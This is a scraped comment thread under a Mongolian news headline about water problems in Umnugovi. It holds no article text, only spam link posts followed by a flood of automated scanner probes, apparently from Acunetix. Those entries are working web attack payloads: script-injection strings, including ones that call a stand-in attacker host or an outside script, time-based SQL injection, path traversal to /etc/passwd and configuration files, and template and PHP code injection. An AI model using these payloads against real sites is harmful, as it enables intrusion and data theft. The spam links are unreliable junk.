Д.Бат-Эрдэнэ: Өмнөговь ямарч цаг үед усны асуудалтай байсаар ирсэн. Энэ талаар яагаад ярихгүй байгаа юм бэ

Aдмин / Улстөр


Сэтгэгдэл

zktcskxsmx [116.0.1.138] 2021-02-19 08:01:47

Мэдээ.МН zktcskxsmx http://www.g60gt1m01q50kz8mlnqn8i448w0y285is.org/ <a href="http://www.g60gt1m01q50kz8mlnqn8i448w0y285is.org/">azktcskxsmx</a> [url=http://www.g60gt1m01q50kz8mlnqn8i448w0y285is.org/]uzktcskxsmx[/url]

vrekncdk [112.67.171.231] 2020-12-02 08:26:19

Мэдээ.МН [url=http://www.ge525bg4b3gb99xc3l6l29l2m7g5kl17s.org/]uvrekncdk[/url] vrekncdk http://www.ge525bg4b3gb99xc3l6l29l2m7g5kl17s.org/ <a href="http://www.ge525bg4b3gb99xc3l6l29l2m7g5kl17s.org/">avrekncdk</a>

ocvzrskwpe [111.193.95.227] 2020-11-28 14:07:39

Мэдээ.МН <a href="http://www.g9qom45g1i6247b19cx3qkrl97sch590s.org/">aocvzrskwpe</a> ocvzrskwpe http://www.g9qom45g1i6247b19cx3qkrl97sch590s.org/ [url=http://www.g9qom45g1i6247b19cx3qkrl97sch590s.org/]uocvzrskwpe[/url]

ctfegfjnji [123.178.150.230] 2020-11-27 22:35:22

Мэдээ.МН [url=http://www.gx1hkt6k0t1egv3a1428t0ni912m9d82s.org/]uctfegfjnji[/url] ctfegfjnji http://www.gx1hkt6k0t1egv3a1428t0ni912m9d82s.org/ <a href="http://www.gx1hkt6k0t1egv3a1428t0ni912m9d82s.org/">actfegfjnji</a>

mstkmpssme [123.120.181.181] 2020-11-26 13:21:28

Мэдээ.МН <a href="http://www.gz62c2ow8v31831gqb9h1550rpk28cwvs.org/">amstkmpssme</a> mstkmpssme http://www.gz62c2ow8v31831gqb9h1550rpk28cwvs.org/ [url=http://www.gz62c2ow8v31831gqb9h1550rpk28cwvs.org/]umstkmpssme[/url]

imggwebvrz [61.180.184.214] 2020-11-23 15:22:50

Мэдээ.МН [url=http://www.gddfme31x9z2c3e7455ae338v584p3wws.org/]uimggwebvrz[/url] <a href="http://www.gddfme31x9z2c3e7455ae338v584p3wws.org/">aimggwebvrz</a> imggwebvrz http://www.gddfme31x9z2c3e7455ae338v584p3wws.org/

yzefdmcqv [124.114.141.46] 2020-11-23 07:52:10

Мэдээ.МН yzefdmcqv http://www.g2s21v26ax80mq4l9d9ism47g4p8e08hs.org/ <a href="http://www.g2s21v26ax80mq4l9d9ism47g4p8e08hs.org/">ayzefdmcqv</a> [url=http://www.g2s21v26ax80mq4l9d9ism47g4p8e08hs.org/]uyzefdmcqv[/url]

xzbwnkdcg [124.114.141.46] 2020-11-23 07:51:31

Мэдээ.МН <a href="http://www.g5lg82f4ifkcki221z2xk627222r29gss.org/">axzbwnkdcg</a> xzbwnkdcg http://www.g5lg82f4ifkcki221z2xk627222r29gss.org/ [url=http://www.g5lg82f4ifkcki221z2xk627222r29gss.org/]uxzbwnkdcg[/url]

bxeyowosj [111.56.41.37] 2020-11-23 00:48:50

Мэдээ.МН <a href="http://www.gt70gv5271f5l6iu3c51uai82nhn120ls.org/">abxeyowosj</a> [url=http://www.gt70gv5271f5l6iu3c51uai82nhn120ls.org/]ubxeyowosj[/url] bxeyowosj http://www.gt70gv5271f5l6iu3c51uai82nhn120ls.org/

tqidiblnv [111.56.41.37] 2020-11-23 00:47:57

Мэдээ.МН [url=http://www.g43it5r3mm7j4x4j384kx84vx8023xixs.org/]utqidiblnv[/url] tqidiblnv http://www.g43it5r3mm7j4x4j384kx84vx8023xixs.org/ <a href="http://www.g43it5r3mm7j4x4j384kx84vx8023xixs.org/">atqidiblnv</a>

thhfkpwdv [61.180.184.214] 2020-11-18 07:05:39

Мэдээ.МН thhfkpwdv http://www.guk1g6eu5s0992rqi22a61cspd35683rs.org/ [url=http://www.guk1g6eu5s0992rqi22a61cspd35683rs.org/]uthhfkpwdv[/url] <a href="http://www.guk1g6eu5s0992rqi22a61cspd35683rs.org/">athhfkpwdv</a>

fwibhewlx [61.180.184.214] 2020-11-18 07:05:39

Мэдээ.МН fwibhewlx http://www.gmmw5eu583bs859a0ut0v8x71q14i23is.org/ <a href="http://www.gmmw5eu583bs859a0ut0v8x71q14i23is.org/">afwibhewlx</a> [url=http://www.gmmw5eu583bs859a0ut0v8x71q14i23is.org/]ufwibhewlx[/url]

ngfejikyyg [175.5.34.135] 2020-11-14 04:37:06

Мэдээ.МН [url=http://www.gwjc5988y5l28y4190l21tw7s2cccxz0s.org/]ungfejikyyg[/url] ngfejikyyg http://www.gwjc5988y5l28y4190l21tw7s2cccxz0s.org/ <a href="http://www.gwjc5988y5l28y4190l21tw7s2cccxz0s.org/">angfejikyyg</a>

tehrlwjzxt [84.241.4.18] 2020-11-10 10:10:52

Мэдээ.МН [url=http://www.ga35lmdclz4y1y1t570t4a22x7a9u291s.org/]utehrlwjzxt[/url] <a href="http://www.ga35lmdclz4y1y1t570t4a22x7a9u291s.org/">atehrlwjzxt</a> tehrlwjzxt http://www.ga35lmdclz4y1y1t570t4a22x7a9u291s.org/

xvhkllvc [84.241.4.18] 2020-11-10 10:10:37

Мэдээ.МН <a href="http://www.g89zs18x7ie9m5l231t0vp6o2r957kibs.org/">axvhkllvc</a> [url=http://www.g89zs18x7ie9m5l231t0vp6o2r957kibs.org/]uxvhkllvc[/url] xvhkllvc http://www.g89zs18x7ie9m5l231t0vp6o2r957kibs.org/

jehskjddcl [183.48.124.191] 2020-11-06 09:17:52

Мэдээ.МН [url=http://www.gvuny34t56bvtj51281641ffqwa2i185s.org/]ujehskjddcl[/url] <a href="http://www.gvuny34t56bvtj51281641ffqwa2i185s.org/">ajehskjddcl</a> jehskjddcl http://www.gvuny34t56bvtj51281641ffqwa2i185s.org/

njzgthytv [36.37.124.100] 2020-11-05 07:11:55

Мэдээ.МН <a href="http://www.gnm59g53pp2w65m36t2126xo4gawsz79s.org/">anjzgthytv</a> njzgthytv http://www.gnm59g53pp2w65m36t2126xo4gawsz79s.org/ [url=http://www.gnm59g53pp2w65m36t2126xo4gawsz79s.org/]unjzgthytv[/url]

e [116.113.93.82] 2020-10-28 22:35:10

1

e [116.113.93.82] 2020-10-28 22:35:05

1<crVNu5<

e [116.113.93.82] 2020-10-28 22:35:01

1<img sRc='http://attacker-9675/log.php?

e [116.113.93.82] 2020-10-28 22:34:58

1<1FP9pv x=9408>

e [116.113.93.82] 2020-10-28 22:34:56

1<ifRAme sRc=9879.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:34:51

1<W19TWP>YAMMO[!+!]</W19TWP>

e [116.113.93.82] 2020-10-28 22:34:48

1Zf7BF <ScRiPt >jR8L(9634)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:34:44

1<% contenteditable onresize=jR8L(9403)>

e [116.113.93.82] 2020-10-28 22:34:40

1}body{acu:Expre/**/SSion(jR8L(9677))}

e [116.113.93.82] 2020-10-28 22:34:37

1<img<!-- --> src=x onerror=alert(9803);//><!-- -->

e [116.113.93.82] 2020-10-28 22:34:35

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:34:32

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:34:26

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:34:23

1<input autofocus onfocus=jR8L(9249)>

e [116.113.93.82] 2020-10-28 22:34:18

e [116.113.93.82] 2020-10-28 22:34:12

1<ScRiPt>jR8L(9695)</sCripT>

e [116.113.93.82] 2020-10-28 22:34:09

1\u003CScRiPt\jR8L(9576)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:34:06

%31%3C%53%63%52%69%50%74%20%3E%6A%52%38%4C%289232%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:34:03

1<img/src=">" onerror=alert(9458)>

e [116.113.93.82] 2020-10-28 22:33:59

1<img src=xyz OnErRor=jR8L(9206)>

e [116.113.93.82] 2020-10-28 22:33:55

1<img src=//testasp.vulnweb.com/t/dot.gif onload=jR8L(9044)>

e [116.113.93.82] 2020-10-28 22:33:52

1<body onload=jR8L(9411)>

e [116.113.93.82] 2020-10-28 22:33:47

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9806'>

e [116.113.93.82] 2020-10-28 22:33:44

1<isindex type=image src=1 onerror=jR8L(9377)>

e [116.113.93.82] 2020-10-28 22:33:41

1<svg

e [116.113.93.82] 2020-10-28 22:33:37

1<video><source onerror="javascript:jR8L(9825)">

e [116.113.93.82] 2020-10-28 22:33:32

1<ScRiPt >jR8L(9514)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:33:29

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9627></ScRiPt>

e [116.113.93.82] 2020-10-28 22:33:25

1<ScRiPt >jR8L(9099)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:33:19

1<ScR<ScRiPt>IpT>jR8L(9882)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:33:14

1<script>jR8L(9469)</script>

e [116.113.93.82] 2020-10-28 22:33:11

1<WIJDOU>MHYMD[!+!]</WIJDOU>

e [116.113.93.82] 2020-10-28 22:33:07

1<ScRiPt >jR8L(9260)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:33:00

{{10000256*10000206}}

e [116.113.93.82] 2020-10-28 22:32:57

acux6245

e [116.113.93.82] 2020-10-28 22:32:53

acu4108<s1﹥s2ʺs3ʹuca4108

e [116.113.93.82] 2020-10-28 22:32:49

19107601

e [116.113.93.82] 2020-10-28 22:32:46

'"()&%<acx><ScRiPt >jR8L(9092)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:32:42

1'"()&%<acx><ScRiPt >jR8L(9667)</ScRiPt>

e [116.113.93.82<iZj7Ra<] 2020-10-28 22:32:36

1

e [116.113.93.82<img sRc='http://attacker-9347/log.php?] 2020-10-28 22:32:32

1

e [116.113.93.82<6EUD5B x=9973>] 2020-10-28 22:32:27

1

e [116.113.93.82] 2020-10-28 22:32:26

1

e [116.113.93.82<ifRAme sRc=9623.com></IfRamE>] 2020-10-28 22:32:23

1

e [116.113.93.82] 2020-10-28 22:32:22

1

e [116.113.93.82<WVAESB>D9NDU[!+!]</WVAESB>] 2020-10-28 22:32:19

1

e [116.113.93.82] 2020-10-28 22:32:17

1

e [116.113.93.82KhAsm <ScRiPt >jR8L(9532)</ScRiPt>] 2020-10-28 22:32:17

1

e [116.113.93.82] 2020-10-28 22:32:15

1<2jRk7z<

e [116.113.93.82<% contenteditable onresize=jR8L(9708)>] 2020-10-28 22:32:12

1

e [116.113.93.82] 2020-10-28 22:32:11

1<img sRc='http://attacker-9836/log.php?

e [116.113.93.82}body{acu:Expre/**/SSion(jR8L(9515))}] 2020-10-28 22:32:07

1

e [116.113.93.82] 2020-10-28 22:32:07

1<1Fwiqy x=9786>

e [116.113.93.82<img<!-- --> src=x onerror=alert(9931);//><!-- -->] 2020-10-28 22:32:05

1

e [116.113.93.82] 2020-10-28 22:32:04

1<ifRAme sRc=9694.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:31:59

1<WP66VV>PZTQL[!+!]</WP66VV>

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:31:59

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:31:56

1

e [116.113.93.82] 2020-10-28 22:31:56

1PkpAr <ScRiPt >Cj7v(9148)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:31:53

1<% contenteditable onresize=Cj7v(9152)>

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:31:52

1

e [116.113.93.82] 2020-10-28 22:31:49

1}body{acu:Expre/**/SSion(Cj7v(9368))}

e [116.113.93.82<input autofocus onfocus=jR8L(9532)>] 2020-10-28 22:31:47

1

e [116.113.93.82] 2020-10-28 22:31:46

1<img<!-- --> src=x onerror=alert(9950);//><!-- -->

e [] 2020-10-28 22:31:45

1

e [116.113.93.82] 2020-10-28 22:31:43

[url=http://www.vulnweb.com][/url]

e [116.113.93.82<ScRiPt>jR8L(9016)</sCripT>] 2020-10-28 22:31:41

1

e [116.113.93.82] 2020-10-28 22:31:38

<a HrEF=jaVaScRiPT:>

e [116.113.93.82\u003CScRiPt\jR8L(9221)\u003C/sCripT\u003E] 2020-10-28 22:31:37

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%6A%52%38%4C%289957%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:31:35

1

e [116.113.93.82] 2020-10-28 22:31:32

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82<img/src=">" onerror=alert(9092)>] 2020-10-28 22:31:31

1

e [116.113.93.82] 2020-10-28 22:31:28

1<input autofocus onfocus=Cj7v(9593)>

e [116.113.93.82<img src=xyz OnErRor=jR8L(9010)>] 2020-10-28 22:31:27

1

e [116.113.93.82] 2020-10-28 22:31:23

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=jR8L(9134)>] 2020-10-28 22:31:22

1

e [116.113.93.82] 2020-10-28 22:31:17

1<ScRiPt>Cj7v(9577)</sCripT>

e [116.113.93.82<body onload=jR8L(9819)>] 2020-10-28 22:31:15

1

e [116.113.93.82] 2020-10-28 22:31:12

1\u003CScRiPt\Cj7v(9062)\u003C/sCripT\u003E

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9287'>] 2020-10-28 22:31:11

1

e [116.113.93.82] 2020-10-28 22:31:09

%31%3C%53%63%52%69%50%74%20%3E%43%6A%37%76%289854%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82<isindex type=image src=1 onerror=jR8L(9323)>] 2020-10-28 22:31:08

1

e [116.113.93.82<svg ] 2020-10-28 22:31:04

1

e [116.113.93.82] 2020-10-28 22:31:04

1<img/src=">" onerror=alert(9187)>

e [116.113.93.82<video><source onerror="javascript:jR8L(9799)">] 2020-10-28 22:31:00

1

e [116.113.93.82] 2020-10-28 22:30:59

1<img src=xyz OnErRor=Cj7v(9042)>

e [116.113.93.82<ScRiPt >jR8L(9824)</ScRiPt>] 2020-10-28 22:30:57

1

e [116.113.93.82] 2020-10-28 22:30:56

1<img src=//testasp.vulnweb.com/t/dot.gif onload=Cj7v(9243)>

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9953></ScRiPt>] 2020-10-28 22:30:53

1

e [116.113.93.82] 2020-10-28 22:30:52

1<body onload=Cj7v(9980)>

e [116.113.93.82<ScRiPt >jR8L(9899)</ScRiPt>] 2020-10-28 22:30:50

1

e [116.113.93.82] 2020-10-28 22:30:49

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9000'>

e [116.113.93.82] 2020-10-28 22:30:47

1

e [116.113.93.82<ScR<ScRiPt>IpT>jR8L(9157)</sCr<ScRiPt>IpT>] 2020-10-28 22:30:47

1

e [116.113.93.82] 2020-10-28 22:30:47

1

e [116.113.93.82] 2020-10-28 22:30:46

1<isindex type=image src=1 onerror=Cj7v(9499)>

e [116.113.93.82] 2020-10-28 22:30:46

4d54nKeJ'));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:30:45

l9H4Jqlp');select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:30:43

407ISFmp';select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:30:43

1<svg

e [116.113.93.82] 2020-10-28 22:30:42

-1));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:30:41

-1);select pg_sleep(6); --

e [116.113.93.82<script>jR8L(9121)</script>] 2020-10-28 22:30:41

1

e [116.113.93.82] 2020-10-28 22:30:40

1<video><source onerror="javascript:Cj7v(9132)">

e [116.113.93.82] 2020-10-28 22:30:38

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:30:38

-1;select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:30:37

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:30:37

tjuYqfyr'; waitfor delay '0:0:3' --

e [116.113.93.82<WDUW3Q>PHZPI[!+!]</WDUW3Q>] 2020-10-28 22:30:36

1

e [116.113.93.82] 2020-10-28 22:30:36

1 waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:30:36

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:30:35

-1); waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:30:35

1<ScRiPt >Cj7v(9701)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:30:34

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:30:34

-1; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:30:33

file:///etc/passwd

e [116.113.93.82] 2020-10-28 22:30:32

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82<ScRiPt >jR8L(9618)</ScRiPt>] 2020-10-28 22:30:32

1

e [116.113.93.82] 2020-10-28 22:30:32

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:30:31

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:30:31

..

e [116.113.93.82] 2020-10-28 22:30:30

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:30:30

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 22:30:29

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:30:29

if(now()=sysdate(),sleep(6),0)

e [116.113.93.82] 2020-10-28 22:30:29

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9870></ScRiPt>

e [116.113.93.82] 2020-10-28 22:30:28

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 22:30:28

e [{{10000038*9999137}}] 2020-10-28 22:30:28

1

e [116.113.93.82] 2020-10-28 22:30:27

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:30:27

e [116.113.93.82] 2020-10-28 22:30:27

-1" OR 2+970-970-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:30:26

/etc/passwd

e [116.113.93.82] 2020-10-28 22:30:26

-1' OR 2+955-955-1=0+0+0+1 or '2yYCAYdQ'='

e [116.113.93.82] 2020-10-28 22:30:25

JyI=

e [116.113.93.82] 2020-10-28 22:30:25

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 22:30:24

-1' OR 2+129-129-1=0+0+0+1 --

e [acux1757] 2020-10-28 22:30:24

1

e [116.113.93.82] 2020-10-28 22:30:24

1<ScRiPt >Cj7v(9781)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:30:24

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:30:23

@@qmajY

e [116.113.93.82] 2020-10-28 22:30:23

-1 OR 2+285-285-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:30:22

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:30:22

1

e [116.113.93.82] 2020-10-28 22:30:22

-1 OR 2+263-263-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:30:21

../../../../../../../../../../etc/passwd.jpg

e [acu5674<s1﹥s2ʺs3ʹuca5674] 2020-10-28 22:30:20

1

e [116.113.93.82] 2020-10-28 22:30:20

1<ScR<ScRiPt>IpT>Cj7v(9337)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:30:20

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:30:20

oeOkGfeR

e [116.113.93.82] 2020-10-28 22:30:19

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:30:19

\

e [116.113.93.82] 2020-10-28 22:30:19

1

e [116.113.93.82] 2020-10-28 22:30:17

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:30:17

1

e [116.113.93.82] 2020-10-28 22:30:17

1'"

e [116.113.93.82] 2020-10-28 22:30:15

1<script>Cj7v(9350)</script>

e [116.113.93.829023381] 2020-10-28 22:30:15

1

e [116.113.93.82] 2020-10-28 22:30:12

1<W4C34M>WWGMX[!+!]</W4C34M>

e ['"()&%<acx><ScRiPt >jR8L(9789)</ScRiPt>] 2020-10-28 22:30:11

1

e [116.113.93.82] 2020-10-28 22:30:10

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 22:30:10

<!--

e [116.113.93.82] 2020-10-28 22:30:09

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 22:30:08

'"

e [116.113.93.82] 2020-10-28 22:30:08

1<ScRiPt >Cj7v(9153)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:30:07

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82'"()&%<acx><ScRiPt >jR8L(9410)</ScRiPt>] 2020-10-28 22:30:07

1

e [116.113.93.82] 2020-10-28 22:30:07

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 22:30:07

/www.vulnweb.com

e [] 2020-10-28 22:30:06

1

e [116.113.93.82] 2020-10-28 22:30:06

;print(md5(acunetix_wvs_security_test));

e [<!--] 2020-10-28 22:30:06

1

e [] 2020-10-28 22:30:06

1

e [116.113.93.82] 2020-10-28 22:30:06

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e ['"] 2020-10-28 22:30:05

1

e [JyI=] 2020-10-28 22:30:04

1

e [/www.vulnweb.com] 2020-10-28 22:30:04

1

e [116.113.93.82] 2020-10-28 22:30:04

create/.

e [@@8mTIw] 2020-10-28 22:30:03

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:30:03

1

e [116.113.93.82] 2020-10-28 22:30:03

create

e [1] 2020-10-28 22:30:02

1

e [116.113.93.82] 2020-10-28 22:30:02

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 22:30:02

create

e [116.113.93.82] 2020-10-28 22:30:02

{{9999116*9999393}}

e [116.113.93.82] 2020-10-28 22:30:01

http://hithtkQjcLIBa.bxss.me/

e [116.113.93.82] 2020-10-28 22:30:01

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [\] 2020-10-28 22:30:01

1

e [116.113.93.82] 2020-10-28 22:30:00

Http://testasp.vulnweb.com/t/fit.txt

e [1'"] 2020-10-28 22:30:00

1

e [116.113.93.82] 2020-10-28 22:29:59

testasp.vulnweb.com/t/xss.html?%00

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:29:59

1

e [116.113.93.82] 2020-10-28 22:29:59

1some_inexistent_file_with_long_name.jpg

e [http://hitKHtWyxk9Zk.bxss.me/] 2020-10-28 22:29:58

1

e [116.113.93.82] 2020-10-28 22:29:58

HttP://testasp.vulnweb.com/t/xss.html?%00

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:29:58

1

e [116.113.93.82] 2020-10-28 22:29:58

acux5730

e [116.113.93.82] 2020-10-28 22:29:57

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:29:57

1

e [116.113.93.82] 2020-10-28 22:29:57

'"()

e [create/.] 2020-10-28 22:29:57

1

e [116.113.93.82] 2020-10-28 22:29:56

Array

e [create] 2020-10-28 22:29:56

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:29:56

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:29:55

1

e [116.113.93.82] 2020-10-28 22:29:55

^(#$!@#$)(()))******

e [create] 2020-10-28 22:29:55

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:29:55

1

e [116.113.93.82] 2020-10-28 22:29:54

acu10552<s1﹥s2ʺs3ʹuca10552

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:29:54

1

e [116.113.93.82] 2020-10-28 22:29:54

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:29:53

)

e [WEB-INF\web.xml] 2020-10-28 22:29:52

1

e [116.113.93.82] 2020-10-28 22:29:51

1

e ['"()] 2020-10-28 22:29:51

1

e [116.113.93.82] 2020-10-28 22:29:51

1

e [116.113.93.82] 2020-10-28 22:29:51

19632011

e [WEB-INF/web.xml] 2020-10-28 22:29:51

1

e [Array] 2020-10-28 22:29:50

1

e [116.113.93.82] 2020-10-28 22:29:50

1

e [/WEB-INF/web.xml] 2020-10-28 22:29:49

1

e [testasp.vulnweb.com] 2020-10-28 22:29:49

1

e [46udpEHs'));select pg_sleep(9); -- ] 2020-10-28 22:29:49

1

e [116.113.93.82] 2020-10-28 22:29:48

Array

e [^(#$!@#$)(()))******] 2020-10-28 22:29:48

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:29:48

1

e [116.113.93.82] 2020-10-28 22:29:48

1&n931685=v915339

e [c7WzZ6WG');select pg_sleep(9); -- ] 2020-10-28 22:29:47

1

e [116.113.93.82] 2020-10-28 22:29:47

Array

e [!(()&&!|*|*|] 2020-10-28 22:29:47

1

e [116.113.93.82] 2020-10-28 22:29:47

'"()&%<acx><ScRiPt >Cj7v(9421)</ScRiPt>

e [file:///etc/passwd] 2020-10-28 22:29:47

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:29:47

1

e [116.113.93.82] 2020-10-28 22:29:46

12345'"\'\");|]*{ <>

e [aSmA37FG';select pg_sleep(9); -- ] 2020-10-28 22:29:46

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:29:46

1

e [116.113.93.82] 2020-10-28 22:29:46

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:29:45

1

e [xfqCOBJd'; waitfor delay '0:0:9' -- ] 2020-10-28 22:29:45

1

e [..] 2020-10-28 22:29:45

1

e [)] 2020-10-28 22:29:45

1

e [116.113.93.82&n924358=v928650] 2020-10-28 22:29:44

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:29:44

1

e [116.113.93.82] 2020-10-28 22:29:44

1'"()&%<acx><ScRiPt >Cj7v(9859)</ScRiPt>

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:29:44

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 22:29:43

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:29:43

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:29:43

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 22:29:42

1

e [116.113.93.82] 2020-10-28 22:29:42

${9999935+9999248}

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:29:42

1

